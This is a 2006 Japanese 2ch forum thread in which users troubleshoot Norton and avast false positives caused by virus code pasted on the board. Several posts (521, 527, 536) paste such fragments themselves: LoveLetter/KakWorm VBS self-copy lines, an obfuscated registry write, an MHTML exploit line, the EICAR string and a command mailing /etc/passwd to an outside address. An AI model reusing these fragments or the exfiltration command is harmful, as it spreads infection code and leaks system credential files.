ヽ____)ノ  ̄ ̄ ̄ / ヽ、
442:ひよこ名無しさん
06/02/24 23:29:37 /hbjD2Uq
>>440
ありがとうございます
443:ひよこ名無しさん
06/02/28 01:33:27 icpaH3Er
JANE DOE STYLEでvbs踏んで、20分後くらいから何かプログラムを実行しようとする度に
ノートンが「xxxxxが1つ以上の認識されないモジュールを使ってインターネットにアクセスしようとしています」
と出て、許可にしないとプログラム実行されず、何も出来ないのですが、これはウィルスに感染してるのでしょうか?
スキャンしても検出されず、過去ログ検索対象外にしても出続けます。
知恵をください。お願いします。
444:ひよこ名無しさん
06/02/28 09:18:46 GU2WNsCd
>>443
VBSを踏んだってのはソースが貼り付けてあるスレを開いたってこと?
それともVBSが実行されたってこと?
445:443
06/02/28 11:01:38
>>444
スレを開いただけです。
遮断ばかりしてたらいつの間にか上記のような状態になってしまってまして、
通信許可にしないと、どのプログラムも動きません。
446:ひよこ名無しさん
06/03/01 15:04:09
>>445
リストから全部削除しろ バカ
WindowsUpdateしていたら何にも感染などしねえわ
447:ひよこ名無しさん
06/03/01 21:25:32
>>446
> WindowsUpdateしていたら何にも感染などしねえわ
それはどうかな?
448:ひよこ名無しさん
06/03/02 19:57:05
>>371で板の見れない問題は解決したのですが、これは危険なのですか?
また暫定的処置という事ですが、なんらかの対応はあったのでしょうか?
449:ひよこ名無しさん
06/03/02 21:46:27
>>448
202.222.31.214 206.223.147.35 (ryって数字が並んでるでしょ。これは2chの鯖の
IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、
警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり
深刻に考えないで良いです。
450:ひよこ名無しさん
06/03/02 21:49:48
>>446
Microsft Update 入れてください(><)
451:448
06/03/03 18:37:00
>>449
サンクス
452:ひよこ名無しさん
06/03/04 05:32:46
avastがvbsウィルスのソースに誤反応
ってスレも立ってほしいなあ
453:ひよこ名無しさん
06/03/13 18:59:55 V3zGYCXt
u
454:ひよこ名無しさん
06/03/13 21:10:07
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
スレリンク(win板:511-514番)
511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
455:ひよこ名無しさん
06/03/21 09:43:56 xHVuEeZu
u
456:ひよこ名無しさん
06/03/23 14:11:32 bCv+njJc
キタ━ <body onload=window()> ━━ !!
457:ひよこ名無しさん
06/03/23 14:12:39
>>456
さっさと消えろ バカ
458:ひよこ名無しさん
06/03/23 14:16:47 bCv+njJc
即反応かよ
459:ひよこ名無しさん
06/03/23 14:18:02
元祖ぶる殿 ◆U/gDqFZzsY の自作自演
スレリンク(pcqa板:837-846番)
837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa
あまりに馬鹿馬鹿しい質問ですいません。
Windows Media Plyaer と KbMedia Player がパソコンの中にあるのですが、MP3ファイルをクリックすると
Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか?
838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:???
>>837
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。
839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa
>>837
1.mp3のファイルをクリック
2.「アプリケーションから開く」を選択
3.プログラムの選択
4.「これらのファイルを開くときは、
いつもこのアプリケーションを使う」にチェック
5.OK
840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:???
>>839
自作自演するときはIDを消しましょうね(ワラ
460:ひよこ名無しさん
06/03/23 22:58:37
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
スレリンク(win板:511-514番)
511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
461:ひよこ名無しさん
06/03/24 12:13:15 +3ig7Sae
総合質問のスレッドで質問したところ、ここに誘導されたので、
再度質問させていただきます。マルチになってしまいますが、お願いします。
OS:XPhome
使用ソフト:ノートンアンチウイルス2006
ウイルスコード的なワームのようなものが貼られたらしく、ノートンが侵入警告を出して、
その後、そのスレとセキュリティ板にアクセスできなくなりました。これは無害でしょうか?あと対処法も教えてください。
ノートンが出したメッセージは、よく覚えてませんが、「2ch」の文字列が始のほうにありました。
ログを削除したのでスレ番号&レス番号までは分かりませんが、初心者の質問板の物凄い勢いで誰かが質問に答える
スレです。昨日の11:30分ほどのレスだったと思います。
462:ひよこ名無しさん
06/03/24 12:14:12 +3ig7Sae
ちなみにjane doe styleで2ちゃんねるを閲覧しています。
463:ひよこ名無しさん
06/03/24 12:15:48
>461
質問する前にこのスレを読めと書いたはずだが
464:ひよこ名無しさん
06/03/24 12:15:50
>>461-462
おまえバカだろ
465:ひよこ名無しさん
06/03/24 12:27:10
>>461
>>4
466:ひよこ名無しさん
06/03/24 12:35:50 +3ig7Sae
ラブレターなどのウイルスではなくノートンプロテクションセンターが、侵入の試みを
遮断みたいなのが出るんですけど、このスレを全部読んでもどれが自分の症状の
解決策なのか分かりません・・・・。
ログのオートプロテクトの除外と手動スキャンの除外は前からしてあるのですが・・・・。
>>4を見ても何がなんだか・・・・。
467:ひよこ名無しさん
06/03/24 12:40:54
>>466
おまえが初めに質問したスレでの自分へのレスをちゃんとよめや
468:釣り氏 ◆RaigyoS2No
06/03/24 12:53:57
>>467
見てきましたが、当方インターネットセキュリティではなくアンチウイルスなので
書いてあることができません・・・・。
469:釣り氏 ◆RaigyoS2No
06/03/24 12:54:46 +3ig7Sae
これは他スレで使ってるコテなので気にしないでください。
470:ひよこ名無しさん
06/03/24 12:57:39
↓出身の方ですか。ご苦労様です。
URLリンク(www.redout.net)
471:ひよこ名無しさん
06/03/24 12:58:06
>>469
何だ釣りなのか。
思いっきり釣られちゃったよ(´∀`)
なかなかの釣り師ですね。
472:釣り氏 ◆RaigyoS2No
06/03/24 12:58:48 +3ig7Sae
具体的にどのレスの何を実行すればいいかということだけでも教えてくれませんか?
473:釣り氏 ◆RaigyoS2No
06/03/24 12:59:42 +3ig7Sae
>>471
このコテはリアルで魚釣りなんで・・・・。
マジレスお願いします・・・。
474:ひよこ名無しさん
06/03/24 13:00:55
釣り氏 ◆RaigyoS2Noで検索
URLリンク(www.google.com)
475:釣り氏 ◆RaigyoS2No
06/03/24 13:04:32 +3ig7Sae
すみません。これ以上いると荒れるようなので、これで失礼します・・・。
質問は却下ということでお願いします・・・・。
476:ひよこ名無しさん
06/03/24 13:05:10
>>473
何の魚を飼ってたの?環境省にごめんなさいしなきゃいけなかったなんて。。
477:ひよこ名無しさん
06/03/24 13:08:04
>>476
ブルーギル
478:ひよこ名無しさん
06/03/24 13:08:25
>>473
本当に「インターネットセキュリティではなくアンチウイルス」なら、これが
参考になるかも(自分は2年ほど前にノートンやめたので確認できないが)
スレリンク(operate板:781番)
479:ひよこ名無しさん
06/03/24 13:10:03
>>477
(ノ∀`) アチャー
480:名無しさん@お腹いぱーい。
06/03/24 21:51:35
緊急的に変えてみました。
URLリンク(info.2ch.net)
他にNAVのワーム誤反応に関する対処方法が見つかりましたらお知らせください。
481:ひよこ名無しさん
06/03/24 23:32:32 5GkwjhYT
>>480の誤反応スクリプトやろうと思ったけど、オートプロテクトを無効にしても攻撃を遮断するんだよね。
だからできなかった。まあIEで読めるからいいんだけどね。
482:ひよこ名無しさん
06/03/25 00:28:09 yFt5KPiX
カサマツさん
483:ひよこ名無しさん
06/03/25 10:37:30
ぼるぷー ◆sTCCYJJ/Lo の 自作自演
スレリンク(win板:511-514番)
511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
484:ひよこ名無しさん
06/03/25 15:16:53 yFt5KPiX
誰か答えてくれ。
485:Today+ 210-194-140-30.rev.home.ne.jp+Dinner
06/03/25 15:28:44
あれ?
486:ひよこ名無しさん
06/03/25 21:06:36
◆OCHZHO05EY の 自作自演
スレリンク(win板:511-514番)
511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。
512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。
513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?
514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?
487:ひよこ名無しさん
06/03/26 00:25:22
>>480
こういうサイトって新鯖に変わるごとに新しい鯖のアドレス追加してるのですか?
それとも、それは手動で追加しないと駄目なのですか?
488:ひよこ名無しさん
06/03/26 01:50:45
>>487
手動で追加してください。
489:ひよこ名無しさん
06/03/26 10:00:20
>>487
手動ですね ある意味DNS鯖と逆を行く作業な訳ですから
490:ひよこ名無しさん
06/03/26 13:41:53 L69KVZ4+
>>1を読んだんですが、
ログ保存フォルダを手動スキャンから除外するのは何故なんでしょうか?
491:ひよこ名無しさん
06/03/26 13:42:57 We2xmHRt
スーパー競馬のモバイル投票(通信費以外無料)で
【宮記念】みんなでウインクリューガーを1番人気にしよう!
スレリンク(keiba板)
モバイル
↓
URLリンク(mob.cx-keiba.jp)<)
フジテレビ15:00~から始まるスーパー競馬で
みんなウインガー(本来はありえない人気薄の馬w)に投票して
若槻千夏と福原アナのリアクション見ようぜwww
頼むおまいら!!フジVSvip、vipperの力を見せてくれ!!!!!
) ∩∩ (
┏┓ ┏━┓ .) |.巾| ( .┏┓┏┓┏┓┏┓
┏┛┗┓┃ ■ ┃┏━━ ノ人ヽ ━━┓┃┃┃┃┃┃┃┃
┣- -┫┃┏┓┃┗━━//━\\━━┛┃┃┃┃┃┃┃┃
┗┓┏┛┗┛┃┃ Λ_Λ/ ∩∩ \ Λ_Λ ┣┫┣┫┣┫┣┫
┗┛ ┗┛ ( ´∀) |.┃| (∀` ) .┗┛┗┛┗┛┗┛
/ ⌒\ ノ 人ニニニニニ⌒\
/ /\ Y / \ \
ノ / __ ̄_______ ヽ ヽ ノ⌒、
ノ^ヽ (( / |||┌───┐ ⑪ | | 入 Y⌒/\)
|_/ \`Y / ||| |ヽ(゚∀゚)ノ .| ◎ | / | / \/
// /\/ .||| | ( ) ヽ(゚∀゚).| .| ─ し/\) \\
/// / / ||| | < < (゚∀゚)ノ | |||||| | \ \ \\
スーパー競馬
492:ひよこ名無しさん
06/03/26 14:18:37
>>490
誤反応させないようにするためじゃないの?
493:ひよこ名無しさん
06/03/26 14:20:11
>>490
本当に>>1を読んだなら理解できるはず。
簡単にまとめると、ノートンはウィルスとして動作しないものまでウィルスと判定する。
(部分的なパターン照合だけで判定するため)
ノートンのこの性質を悪用して、ノートンを反応させる文字列を2chに貼りまくるヴァカが大勢いる。
ノートン側も2ch側も対応する気はなく、ノートンユーザーが各自対策するしかない。
「手動スキャン」に限って言えば、自動で駆除/隔離しないようにして、いちいち
手動で対応してもよいなら敢えて除外しないという選択もあり。
494:ひよこ名無しさん
06/03/27 01:29:18 l0NeUula
Avastですが191の方法でも駄目です。
私だけでもないようです
524 :名無しさん@お腹いっぱい。 :2005/06/11(土) 16:44:33
こんにちは。質問です。
2ちゃんを見てると時々ウイルスが発見されて
スレ自体が見られなくなるんですが、良い解決策があれば教えてください。
2ちゃんブラウザはギコナビ、アンチウイルスはavast!です。
発見されるウイルスはWin32:Mhtplo-26 [Trj]ってのです。
avastの設定の「例外」に
2ちゃんのlogファイルを入れてみたんですがそれでも駄目でした。
495:ひよこ名無しさん
06/03/27 01:29:55
>>494
ウイルス持って逃げろ。
496:ひよこ名無しさん
06/03/27 03:08:39 l0NeUula
意味がわかりません
497:ひよこ名無しさん
06/03/27 07:11:47
最近PCが重い!
│
├ 1.PCを買い換える
│
│ [まちがい]
│ 確実な方法ではありますが、お金がかかるのが難点です。
│ それよりも別の手段を探してみませんか?
│ ちょっとしたフリーウェアでなんとかなるかも?
│ ↑
│ ココがポイント!
│
└ 2.RegSeekerを使う
[せいかい]
Regseeker
URLリンク(www.hoverdesk.net)
RegSeeker1.3Beta日本語ファイル
URLリンク(downloads.at.infoseek.co.jp)
498:ひよこ名無しさん
06/03/27 15:04:09
漏れなくシステム破壊の特典あり!!!
499:ひよこ名無しさん
06/03/27 15:18:31 l0NeUula
意味がわかりません
500:ひよこ名無しさん
06/03/27 16:03:22
>>494
ここにavastユーザーはあまりこないので
誘導されたこととテンプレをよく読んで
より詳しい環境を添えて↓で聞いてください。
avast! Anti-Virus Part41
スレリンク(sec板)
501:ひよこ名無しさん
06/03/27 22:43:15 l0NeUula
最初そちらに書き込もうと思ったのですが
質問できる雰囲気じゃないんです。
502:ひよこ名無しさん
06/03/28 01:04:40
>>501
新スレに移行しましたね。
avast! Anti-Virus Part43
スレリンク(sec板)
>>500にもありますがテンプレをよく読んで誘導されたこととより詳しい環境を添えて聞いてください。
嵐があっても見てくださる人はいます。
チャットではないので即レスは期待しないでくださいね。
邪魔が入ってスルーされたと感じて再投稿する場合や再質問する場合は最初に質問したレス番を名前欄に入れてください。
参考に
一般的な質問の仕方
URLリンク(ansitu.xrea.jp)
503:ひよこ名無しさん
06/03/28 14:26:03 YrT7DvdY
502さんありがとう。
流れが相変わらず速いので機を見て質問することにします。
次回はNortonだけでなくAvastもスレのタイトルに加えてください。
504:ひよこ名無しさん
06/04/10 20:39:28 x24VBSPG
↑
505:ひよこ名無しさん
06/04/10 21:13:51 xObkN9pL
Wscript.KakWormっていうウィルスを↓のスレを見るたびに感染します。
スレリンク(ascii板)
(´・ω・`)ボスケテ
ノートンさんが反応します。
506:ひよこ名無しさん
06/04/10 21:16:42
>>505
キンタマです。
507:ひよこ名無しさん
06/04/10 21:20:28
>506
誤反応ってことですか??
508:ひよこ名無しさん
06/04/10 21:20:58
>>507
トロイです。
509:ひよこ名無しさん
06/04/10 21:21:56
>>508
(´・ω・`)ショボン
510:ひよこ名無しさん
06/04/10 21:23:26
検疫→削除で桶ですか??
511:ひよこ名無しさん
06/04/10 21:25:47
683を除外(´・ω・`)
512:ひよこ名無しさん
06/04/10 21:27:20
>>511
初心者なもので分かりませんorz683とは何ですか?
513:sage
06/04/10 21:58:13 EhjrOlSY
テスト
514:ひよこ名無しさん
06/04/10 21:58:27
>>512
キンタマです。
515:ひよこ名無しさん
06/04/10 21:59:34
テスト
516:SAGE
06/04/10 22:01:07 EhjrOlSY
テスト
517:ひよこ名無しさん
06/04/10 22:02:04
テスト
518:ひよこ名無しさん
06/04/10 22:03:53
テスト
519:ひよこ名無しさん
06/04/12 21:37:07 oU4WH0fi
スレリンク(pachij板)
ここのすれの>>457のところにウイルスコードがあってあるので、
ノートンを立ち上げて、オプション→オートプロテクト→除外→新規→フォルダー?アイコン→
ローカルディスク(C)→プログラムファイル→Live2ちゃん→log→money4.2ch.net→pachij→
1140536153と1140536153.idx→すべてOKで閉じ
をしたのに、相変わらず上のスレではノートンが反応します。
再度除外項目を見たのですがきちんと除外項目に入ってました。
何故反応するのでしょうか??
520:ひよこ名無しさん
06/04/12 22:14:11 oU4WH0fi
age
521:ひよこ名無しさん
06/04/12 22:35:04
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
522:519
06/04/12 22:53:09 oU4WH0fi
他で聞きます。
523:ぴーこ名無しさん
06/04/13 00:07:39
>>519,522
・・・
>>1
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
ログフォルダの場所等についてはお使いの2ちゃんねるブラウザの配布サイト・ヘルプ・スレ等で確認してください。
また、これとは別にワーム誤反応対策の設定もしてね。
URLリンク(info.2ch.net)
2chNIS問題まとめページ
URLリンク(mickey.mirv.net)
524:ひよこ名無しさん
06/04/15 16:37:44
一昨日くらいからスレが見れなくなった
もちろんログ除外はしてあるのに、ノートン切ると見れる
どうして?ちなみに専ブラはギコナビ
525:ひよこ名無しさん
06/04/15 23:21:55
>>524
誤反応
526:ひよこ名無しさん
06/04/16 09:18:27
>>524
ログ除外以外にもやる事がある
>>1から読め
527:ひよこ名無しさん
06/04/17 20:53:52 Se29R1qE
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
<body onload=window()>
528:ひよこ名無しさん
06/04/24 17:37:20 2zoSjqC7
にくちゃんねるでログ漁ってたら「ワーム検出で遮断」とかで結局目的のスレが見られないんだが諦めるしかないのかな。
htmlを拡張子の検出対象から外すのもアレだし、ワーム防止をオフにするのもあんまりよろしくなさそうなんだがね。
エロイ人でもエロくない人でも良いから詳しく知ってる人教えておくれ。
529:ひよこ名無しさん
06/04/24 20:13:42
ふーん
530:ひよこ名無しさん
06/04/30 18:51:48
>NIS2005の場合(多分NIS2006も同じ)
同じではない件に付いて
531:ぴーこ名無しさん
06/05/01 23:31:23
>>530
kwsk
532:ぴーこ名無しさん
06/05/01 23:32:01
目欄が・・・orz...........
533:ひよこ名無しさん
06/05/04 23:17:25 Gcx9i+9f
>>524と同じ症状です。
ここ1週間から出てる。
534:ひよこ名無しさん
06/05/13 05:26:57 w+9rO7hg
, -'"´  ̄`丶、_
,.∩ `ヽ
〃∪'´ ̄`二二人\ ヽ
| ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
|ハ ,ニ、 ,. - 、 | | | l |
| ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
| | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔
| ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
l l /\ .. イV\川 |
,' l l ,イ `l ̄´ / /ヽl l
l | l ハ `メ、 〃 ヽヽ、__ノ
l ∨ └‐イ「ト--ァ'´ ハヽ__ノ
ヽ/ } l」」 / / }`ー
〈_n| 八 / / /ノ
〈二二人 c /\/ / , イ
/ /厂 /\__>< {_
535:ひよこ名無しさん
06/05/13 09:57:56
, -'"´  ̄`丶、_
,.∩ `ヽ
〃∪'´ ̄`二二人\ ヽ
| ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
|ハ ,ニ、 ,. - 、 | | | l |
| ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
| | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔
| ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
l l /\ .. イV\川 |
,' l l ,イ `l ̄´ / /ヽl l
l | l ハ `メ、 〃 ヽヽ、__ノ
l ∨ └‐イ「ト--ァ'´ ハヽ__ノ
ヽ/ } l」」 / / }`ー
〈_n| 八 / / /ノ
〈二二人 c /\/ / , イ
/ /厂 /\__>< {_
536:ひよこ名無しさん
06/05/15 14:24:13
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
537:ひよこ名無しさん
06/05/19 20:06:44
保守age
538:ひよこ名無しさん
06/05/24 01:38:47 uOt5d8a9
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか?
539:ひよこ名無しさん
06/05/24 01:40:06
___
/ \ ________
/ ´` \ /
| ・ ・ | <おい糞元祖ぶる殿 ◆U/gDqFZzsY.急ぎでラーク買うて来い
| (● ●) | \________
\ ⊂ニ⊃ ノ
\ ⊂ニ⊃
 ̄ ̄ ̄
540:ぴーこ名無しさん
06/05/24 02:15:51
>>538
スレリンク(software板:12番)
ログフォルダの指定を今一度確認してください。
以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
URLリンク(service1.symantec.com)
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」 の右側に表示されているボタン、[レポートの表示] をクリックする。
541:538
06/05/24 02:24:00
>>540
グミクズがさっさと教えろや
542:538
06/05/24 03:34:43 uOt5d8a9
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね
543:538
06/05/24 03:39:57 uOt5d8a9
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。
544:ぴーこ名無しさん
06/05/24 04:07:14
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。
注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。
545:ぴーこ名無しさん
06/05/24 04:18:41
>>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......
参考に
スレリンク(software板:484-番)n dat落ち
URLリンク(220.254.5.211:8000) ミラー
546:538
06/05/24 04:40:48 uOt5d8a9
>>545
わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
547:ひよこ名無しさん
06/05/24 04:47:04
>>546
俺も暇だからよー
548:ひよこ名無しさん
06/05/24 13:46:43
>>546
俺も暇だからよー
549:cen ◆Am9xOgNMYE
06/05/30 02:32:01 BE:137160162-
こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。
550:cen ◆Am9xOgNMYE
06/05/30 02:32:51 BE:114300252-
忘れてました。
こちらです。
URLリンク(www.geocities.jp)
551:ひよこ名無しさん
06/05/31 22:57:19
bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな
552:ひよこ名無しさん
06/06/01 00:54:09
ダメですた
スレリンク(mnewsplus板:66番)
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな
553:cen ◆Am9xOgNMYE
06/06/01 01:06:54
>>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。
554:ひよこ名無しさん
06/06/01 01:23:16
どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要
555:cen ◆Am9xOgNMYE
06/06/02 01:25:51
こんばんは。
>>17のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
URLリンク(www.geocities.jp)
556:ぴーこ名無しさん
06/06/02 02:28:30
>>4のテンプレ案です。
単純に文字参照を抜いてみました。
ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)
■関連
ノートントラップ
URLリンク(ansitu.xrea.jp)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)
557:ひよこ名無しさん
06/06/02 04:54:27
>>556
Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
相変わらず反応する場合があります。
↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。
558:ぴーこ名無しさん
06/06/03 22:00:18
Q. 2ちゃんねるが文字を置換しないのが悪いって聞いたんだけど
A. 2006年6月から置換するようになりましたが、
ノートンが誤検出する置換できないウィルスコードがあるので反応します。
ノートンがウイルスソースに誤反応の補足
URLリンク(ansitu.xrea.jp)
ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)
■関連
ノートントラップ
URLリンク(ansitu.xrea.jp)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)
>>557
ノシシ
